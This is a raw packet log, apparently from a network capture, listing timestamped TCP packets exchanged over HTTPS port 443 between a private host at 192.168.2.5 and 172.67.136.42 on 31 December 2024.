                                                                              Dec 31, 2024 09:28:16.077747107 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077750921 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.077760935 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077811956 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.077819109 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077853918 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077882051 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077893972 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.077900887 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.077941895 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.165533066 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.166984081 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167023897 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167058945 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167084932 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167104006 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167110920 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167124033 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167151928 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167160988 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167541027 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167589903 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167597055 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167654991 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167690039 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167701006 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167709112 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.167751074 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.167757988 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168299913 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168333054 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168348074 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.168354988 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168399096 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.168406010 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168456078 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.168498993 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.168504953 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169215918 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169270992 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.169279099 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169534922 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169569969 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169575930 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.169583082 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.169630051 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.240818977 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.249572039 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.249627113 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.249663115 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.249783039 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.249799967 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.250636101 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.250694990 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.250703096 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.250711918 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.250755072 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.250802040 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.250858068 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.251142025 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.251187086 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.251204014 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.251211882 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.251230955 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.252013922 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.252072096 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.252079010 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.252125025 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.252149105 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.252197027 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.253067970 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.253122091 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256059885 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256134033 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256181002 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256237030 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256238937 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256249905 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256289005 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256300926 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256346941 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256347895 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256360054 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256403923 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.256422043 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.256470919 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.257129908 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.257188082 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336560965 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336615086 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336684942 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336698055 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336747885 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336764097 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336842060 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336891890 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336895943 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336901903 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.336934090 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.336955070 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337384939 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337439060 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337446928 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337486029 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337769032 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337815046 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337817907 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337832928 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337866068 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337899923 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.337946892 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.337954044 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338001013 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338035107 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338100910 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338397980 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338438034 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338457108 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338463068 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338485003 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338499069 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338505983 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338521957 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338531017 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338572979 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338578939 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338745117 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338803053 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338809967 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338867903 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338922024 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338973999 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.338984966 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.338992119 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.339016914 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.339118958 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.339160919 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.339168072 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.339175940 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.339190960 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.339215040 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341397047 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341454983 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341464043 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341501951 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341604948 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341649055 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341655970 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341661930 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341691017 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341701984 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.341789007 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.341841936 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.342174053 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.342238903 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.343005896 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.343050003 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.343070030 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.343076944 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.343100071 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.343121052 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.423707008 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.423809052 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.423829079 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425482035 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425565004 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.425574064 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425673008 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.425857067 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425909042 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425919056 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.425925970 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.425952911 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.425965071 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427447081 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427500963 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427685022 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427702904 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427756071 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427762985 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427794933 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427809000 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427817106 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427830935 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427846909 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427894115 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.427927971 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.427942991 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428004026 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428010941 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428054094 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428097010 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428112030 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428148031 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428153992 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428170919 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428200006 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428816080 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428837061 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428886890 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428894997 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428914070 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428935051 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428937912 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.428956985 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.428970098 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.429013014 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.429023027 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.429086924 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.510087013 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510106087 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510189056 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.510205984 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510257006 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.510545969 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510561943 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510601997 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.510610104 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.510639906 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.510656118 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.511348963 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511367083 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511420965 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.511429071 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511470079 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.511830091 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511857033 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511895895 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.511903048 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.511934996 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.511961937 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.512254000 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512269020 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512325048 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.512336969 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512377024 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.512835026 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512871027 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512898922 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.512904882 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.512933969 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.512963057 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.513340950 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.513384104 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.513407946 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.513415098 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.513437986 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.513456106 CET44349713172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:16.513501883 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:16.518526077 CET49713443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:52.842461109 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:52.842484951 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:52.842550039 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:52.868510008 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:52.868524075 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.331999063 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.332079887 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.411142111 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.411158085 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.411487103 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.411536932 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.415064096 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.455348015 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763446093 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763490915 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763504982 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.763511896 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763535976 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.763550043 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763572931 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.763580084 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.763606071 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.763648987 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.763961077 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.764004946 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.764008999 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.764013052 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.764046907 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.764065027 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.764434099 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.764473915 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.764478922 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.764519930 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.768073082 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.768124104 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.768130064 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.768311024 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.851763010 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.851828098 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.851829052 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.851839066 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.851876974 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.851882935 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.851888895 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.851933002 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.852442026 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.852488995 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.852493048 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.852500916 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.852535009 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.852565050 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.852569103 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.852611065 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853167057 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853208065 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853213072 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853221893 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853250027 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853266001 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853276968 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853281021 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853306055 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853306055 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853337049 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853343010 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853362083 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853389978 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853950024 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.853995085 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.853998899 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.854032040 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.854038000 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.854042053 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.854072094 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.854078054 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.854099035 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.854104042 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.854125023 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.854151964 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.895747900 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.898256063 CET49905443192.168.2.5172.67.136.42
                                                                              Dec 31, 2024 09:28:53.898262978 CET44349905172.67.136.42192.168.2.5
                                                                              Dec 31, 2024 09:28:53.898351908 CET49905443192.168.2.5172.67.136.42
